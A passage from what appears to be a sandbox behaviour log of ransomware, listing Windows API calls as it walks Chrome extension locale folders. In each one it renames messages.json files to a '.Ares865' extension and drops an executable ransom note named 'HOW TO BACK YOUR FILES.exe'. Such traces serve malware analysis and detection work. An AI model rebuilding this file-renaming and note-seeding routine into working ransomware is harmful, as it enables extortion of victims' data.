ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ed7c560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.007] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.007] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.007] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.Ares865") returned 161 [0103.007] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.008] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.009] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=258) returned 1 [0103.012] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id" [0103.012] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id" [0103.012] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.012] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.013] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.013] GetLastError () returned 0x0 [0103.013] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.013] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86f0b190, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ed7c560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ed7c560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.013] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.013] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.014] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.Ares865") returned 161 [0103.014] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.015] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.015] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=261) returned 1 [0103.021] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu" [0103.021] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu" [0103.021] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.021] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.022] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.022] GetLastError () returned 0x0 [0103.022] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.022] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86f0b190, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ed7c560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ed7c560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.022] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.022] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.023] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.Ares865") returned 161 [0103.023] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.024] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.024] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=264) returned 1 [0103.027] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr" [0103.027] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr" [0103.028] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.028] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.028] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.029] GetLastError () returned 0x0 [0103.029] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.029] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86f0b190, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ed7c560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ed7c560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.029] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.029] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.029] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.Ares865") returned 161 [0103.029] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.030] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.031] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=263) returned 1 [0103.034] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi" [0103.034] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi" [0103.034] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.034] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.035] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.035] GetLastError () returned 0x0 [0103.036] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.036] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86ee5030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eda26c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eda26c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.036] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.036] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.036] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.Ares865") returned 161 [0103.036] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.037] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.038] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=345) returned 1 [0103.041] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he" [0103.041] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he" [0103.041] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.041] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.042] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.042] GetLastError () returned 0x0 [0103.042] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.042] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86ee5030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4eda26c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4eda26c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.042] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.042] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.042] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json.Ares865") returned 161 [0103.043] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User 